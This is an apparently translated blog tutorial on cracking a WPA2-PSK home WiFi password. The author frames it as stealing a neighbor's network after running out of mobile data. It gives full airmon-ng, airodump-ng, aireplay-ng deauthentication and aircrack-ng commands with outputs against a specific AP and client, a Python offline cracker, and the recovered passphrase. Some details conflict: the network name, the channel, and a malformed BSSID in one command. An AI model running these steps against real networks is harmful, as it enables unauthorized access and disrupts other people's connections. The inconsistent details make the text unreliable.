This article is for technical learning and communication only. Please do not casually target your neighbors.
Preparation#
You will need the following:
- A wireless adapter whose driver supports monitor mode and packet injection (injection is needed for the deauthentication step)
- A good wordlist (this is a dictionary attack, so it only succeeds if the passphrase is in the list)
- A nearby WPA/WPA2-PSK network that you are authorized to test
Recently I ran out of mobile data and thought about trying to steal some WiFi, so I checked the WiFi networks around me.
There were quite a few, so I started to see whether I could get into one.
Technical Principles#
WiFi Authentication#
WiFi networks commonly use one of four security modes:
- None (open network)
- WEP
- WPA/WPA2-PSK (pre-shared key, also called "personal" mode)
- WPA/WPA2 with 802.1X (RADIUS authentication, "enterprise" mode)
Home and small-office routers are almost always set to the third type, and that is what this article targets. WPA3-SAE is not in the list: its handshake does not expose anything that can be brute-forced offline in this way, so the method below does not apply to it.
WPA-PSK Authentication Process#
- The AP periodically broadcasts beacon frames, which is how the client keeps its list of available networks up to date.
- The client sends Probe Request frames on each channel (1-13 on 2.4 GHz). For a visible network the request carries the ESSID; for a hidden network it does not.
- The AP on that channel answers with a Probe Response containing the ESSID and the RSN information element (which advertises WPA/WPA2, the cipher and the key management type).
- The client sends an Authentication frame to the target AP. The authentication algorithm field is 0 for Open System or 1 for Shared Key (WEP only); WPA/WPA2 always uses Open System here, because the real authentication happens later in the handshake.
- The AP replies with its own Authentication frame.
- The client sends an Association Request to the AP.
- The AP answers with an Association Response.
- The EAPOL four-way handshake runs. These four frames are what the cracker needs.
- The handshake completes and the client has network access.
WPA-PSK Four-Way Handshake Authentication Process#
The four EAPOL-Key messages that make up the handshake:
- Message 1 (AP to client): the AP sends its random ANonce.
- Message 2 (client to AP): the client sends its random SNonce plus a MIC computed with the key it has just derived.
- Message 3 (AP to client): the AP confirms it derived the same key, again with a MIC, and delivers the encrypted group key (GTK).
- Message 4 (client to AP): the client acknowledges, with a MIC.
Both sides derive the pairwise key from the PSK, the SSID, both MAC addresses and both nonces; the PSK itself never crosses the air. Only the MIC does, and that is exactly what an offline attack checks candidates against.
WPA-PSK Cracking Principle#
For each candidate passphrase in the dictionary, compute PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). This is by far the most expensive step and is the bottleneck of the whole attack. Then combine the PMK with the client MAC, the AP's BSSID, ANonce and SNonce (all read from the captured handshake) to derive the PTK; the first 16 bytes of the PTK are the KCK. Use the KCK to compute the MIC over the captured EAPOL-Key frame (with its MIC field zeroed) and compare it with the MIC the frame actually carries (message 2 from the client, or message 3 from the AP). If they match, the candidate is the PSK.
As shown in the figure:
So the method is simply to brute-force the captured handshake offline. Success depends entirely on the passphrase being in the wordlist, so download good dictionaries (search GitHub or Google). Because PBKDF2 is the cost, aircrack-ng on a CPU is slow for large lists; the same handshake can be handed to a GPU cracker such as hashcat, but the computation is identical.
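To make the principle above concrete, here is an added worked example (not code from the original article): it implements the PMK, PTK and MIC steps in pure Python and runs a small dictionary against a handshake that is constructed inside the script from a known passphrase, so it runs offline. The SSID, BSSID, client MAC and passphrase are the ones that appear later in this article; the nonces, the wordlist and the minimal EAPOL-Key message 2 layout are assumptions made for the demonstration.

```python
import hashlib
import hmac
import struct

# Added example (not the article's own code): the offline WPA2-PSK attack
# described above, end to end. The "captured" handshake is CONSTRUCTED below
# from a known passphrase so the script is self-contained.


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step: every dictionary candidate costs 4096 HMACs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """PRF-n from IEEE 802.11i: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP) from the PMK, both MAC addresses and both nonces.
    min/max ordering makes AP and client derive the same value; KCK = PTK[:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields that precede the MIC (77)


def eapol_mic(kck: bytes, eapol_frame: bytes, version: int) -> bytes:
    """MIC over the whole EAPOL frame with its 16-byte MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP), RSN descriptor, CCMP (assumed layout).
    key_info 0x010a = descriptor version 2 | pairwise | MIC bit."""
    body = struct.pack(">BHH", 2, 0x010A, 16)          # descriptor type, key info, key length
    body += struct.pack(">Q", 1)                       # replay counter
    body += snonce                                     # key nonce (32 bytes)
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
    body += mic                                        # key MIC (16 bytes)
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL: version 1, type 3 (Key), length


def crack(ssid, aa, spa, anonce, snonce, eapol_frame, wordlist, version=2):
    """For each candidate: PMK -> PTK -> KCK -> MIC, compared with the captured MIC."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = derive_pmk(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, version), captured_mic):
            return candidate
    return None


# --- Constructed handshake (not a real capture) ---
SSID = "203"                              # ESSID from the article's airodump-ng output
AA = bytes.fromhex("1475909E298E")        # AP BSSID from the article
SPA = bytes.fromhex("E0DCFFDC5A89")       # client MAC from the article
ANONCE = bytes(range(32))                 # fixed nonces so the run is reproducible (assumed)
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "99998888"              # the passphrase found at the end of the article


def make_captured_msg2(passphrase: str) -> bytes:
    """Simulate the client side: sign message 2 with the KCK derived from the real PSK."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE), 2))


CAPTURED_MSG2 = make_captured_msg2(REAL_PASSPHRASE)
WORDLIST = ["12345678", "password", "88888888", "99998888", "admin123"]  # constructed dictionary

if __name__ == "__main__":
    found = crack(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)
    print("KEY FOUND! [ %s ]" % found if found else "Passphrase not in dictionary")
```

Everything a real capture gives the cracker is what this script reads from its own constructed frame: the two MAC addresses, the two nonces and the MIC-bearing EAPOL frame. Note that a WPA (TKIP) handshake uses descriptor version 1 and HMAC-MD5, so a MIC computed with the wrong version never matches even for the right passphrase; the `version` argument is there to make that visible.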
Start Stealing#
Start the Network Card#
I am using Kali in a virtual machine; when you plug in the USB wireless adapter, choose to attach it to the virtual machine rather than the host.
ifconfig -a   # lists all network interfaces, including ones that are down
If the adapter is attached correctly there should be an interface named wlan0 (on newer systems `ip link show` gives the same information).
Next, bring the interface up. If the command prints nothing, it succeeded:
ifconfig wlan0 up
Activate the Network Card in Monitor Mode#
Before switching modes it is worth stopping the processes that would otherwise keep reconfiguring the adapter (NetworkManager, wpa_supplicant); `airmon-ng check kill` does this for you. Then:
airmon-ng start wlan0
Your adapter's indicator light should come on at this point. airmon-ng also prints the driver and chipset it detected and the new interface name, so you can confirm that the right device was switched.
The interface name in monitor mode is normally wlan0mon (`iw dev` shows the interfaces and their modes if you want to double-check). Remember this name; every later command uses it.
Detect Surrounding Wireless Networks#
I am currently connected to my mobile hotspot. After inserting the wireless network card, I will start sniffing the surrounding WiFi devices.
airodump-ng wlan0mon
This lists the surrounding APs. PWR is the received signal strength in dBm, so values closer to 0 mean a stronger signal. From experience, anything above -70 dBm is workable, above -60 dBm is ideal, and below -70 dBm the link is too weak and unstable to reliably capture the handshake.
Here we will target the WiFi named "You Walk Old Hot Pot", so we need to record its BSSID and CH: the BSSID is the AP's MAC address and uniquely identifies the network, and CH is its channel. Prefer a network whose PWR value is closest to 0 (for example -40 rather than -80), since that is the strongest signal.
The columns you will use most in this output:
- BSSID: the AP's MAC address
- PWR: signal level in dBm (-1 means the driver cannot report it)
- Beacons: beacon frames seen from the AP; #Data: data frames captured; #/s: data frames per second
- CH: channel; MB: maximum supported rate; ENC / CIPHER / AUTH: the security mode (for us WPA2 / CCMP / PSK)
- ESSID: the network name
- In the station list: STATION is the client's MAC address, Lost counts frames lost from that client, Frames counts frames seen from it, and Probes lists the network names it has probed for
Select the WiFi to Crack and Target for Handshake Capture#
airodump-ng wlan0mon -c 7 --bssid 14:75:90:9E:29:8E
The -c parameter locks the adapter to one channel, and --bssid filters for the AP's MAC address. One check before you run this: the CH column in the output below shows this AP on channel 11, not 7, and the capture command later in the article uses -c 11. Lock to the channel airodump-ng reports for the AP, otherwise you will miss frames.
After a few seconds the output looks like this:
```
 CH 7 ][ Elapsed: 6 s ][ 2021-04-07 23:41

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 14:75:90:9E:29:8E  -37   1       89     4294  299  11  270  WPA2 CCMP   PSK  203

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 14:75:90:9E:29:8E  48:7D:2E:B3:04:DF  -29    0 - 1e     0         7
 14:75:90:9E:29:8E  E0:DC:FF:DC:5A:89  -40    0 - 0e   817      4259
 14:75:90:9E:29:8E  80:ED:2C:10:0D:8A  -63    0 -24      0         2
 14:75:90:9E:29:8E  FA:83:C4:C0:8F:DF  -60    0e-24     88        88
```
From this output we can read:
- Four client devices are currently connected to this WiFi, each listed with its MAC address, frame counts and so on. Pick a client that is actively sending traffic (its Frames and Lost counters keep changing), because the deauthentication attack in the next step only produces a handshake if that client is really present and reconnects. Here we choose E0:DC:FF:DC:5A:89, by far the most active one.
So far we have the following useful information:
- WiFi BSSID (AP MAC address): 14:75:90:9E:29:8E
- MAC address of one connected client: E0:DC:FF:DC:5A:89
- WiFi channel: 11
Listen for Handshake Packets#
Next, we need to capture packets based on the above information and try to obtain the handshake packet containing the key.
airodump-ng wlan0mon --bssid 14:75:90:9E:29:8E -c 11 -w 203
Parameter explanation: -w is the output file prefix, -c the channel, --bssid the AP's MAC address. airodump-ng numbers its output files, so -w 203 produces 203-01.cap (plus .csv and other side files), and the number increases on each run. You can also capture with another tool such as Wireshark or tcpdump; airodump-ng has the advantage of telling you in its header line when it has seen a handshake.
airodump-ng --ivs --bssid E6:9A:DC:79:7:EC -w longas -c 1 wlan0mon
PS: I recommend this form. --ivs filters what is written to disk: instead of every frame it saves only the initialization vectors (useful for WEP) and the WPA handshake data, so the file stays small, and the output file then ends in -01.ivs rather than -01.cap. Two caveats: the .ivs format is only readable by aircrack-ng, so if you want to inspect the frames in Wireshark or feed the handshake to another cracker keep the full .cap, and capturing without --ivs just gives you a bigger file, not a worse one. I will use this form in the images that follow.
When a client connects while you are listening, the handshake is captured passively. But you cannot count on a client connecting while you wait. To force one, kick an already connected client off the network: it will reconnect automatically and perform a fresh handshake.
Execute Deauthentication Attack to Obtain Handshake Packet#
Next we use aireplay-ng to send deauthentication frames. When the client reconnects, airodump-ng (still running in the other terminal) should capture the handshake.
aireplay-ng wlan0mon -0 10 -a 14:75:90:9E:29:8E -c E0:DC:FF:DC:5A:89
Here -0 selects the deauthentication attack mode, and the following 10 is how many deauth bursts to send (0 means keep sending until you stop it). -a is the BSSID of the AP and -c is the MAC address of the connected client to kick off.
The output of this command looks like this:
```
23:55:26 Waiting for beacon frame (BSSID: 14:75:90:9E:29:8E) on channel 11
23:55:28 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [27| 1 ACKs]
23:55:29 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 3| 1 ACKs]
23:55:30 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 2| 6 ACKs]
23:55:32 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 8| 7 ACKs]
23:55:34 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7| 7 ACKs]
23:55:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7|14 ACKs]
23:55:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [34| 3 ACKs]
23:55:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [22| 6 ACKs]
23:55:43 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 5| 5 ACKs]
23:55:45 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [10| 6 ACKs]
```
The two numbers in brackets are ACKs received from the client and from the AP; if they stay at 0 the frames are not being heard, which usually means a weak signal or an adapter that cannot inject.
If this fails repeatedly, drop the -c parameter: aireplay-ng then sends broadcast deauthentication frames to every client of the AP, which raises the chance that at least one of them reconnects while you are capturing. One thing can stop the attack from working at all: clients and APs that have negotiated 802.11w Protected Management Frames drop unprotected deauthentication frames, so they will not disconnect no matter how many you send.
In practice, I usually disconnect all the clients so that they reconnect.
Keep watching the airodump-ng terminal. As soon as its header line shows WPA handshake followed by the BSSID, the handshake has been captured; stop aireplay-ng, since there is no need to keep deauthenticating, and you can stop the capture as well.
```
CH 11 ][ Elapsed: 6 mins ][ 2021-04-08 00:05 ][ WPA handshake: 14:75:90:9E:29:8E
```
Dictionary Cracking#
Next we use the prepared dictionary and the captured handshake for the brute-force run:
aircrack-ng -w common.txt 203-01.cap
-w is our dictionary and 203-01.cap is the capture file containing the handshake (use the file airodump-ng actually wrote; if you captured with --ivs, that is 203-01.ivs instead). Before cracking, aircrack-ng lists the networks in the file and how many handshakes it found for each; if it reports 0 handshakes, go back and capture again rather than waiting for a run that cannot succeed.
I was lucky; the password was relatively simple.
KEY FOUND! [ 99998888 ] is the password.
Finally#
Please treat your neighbors well and do not casually target them.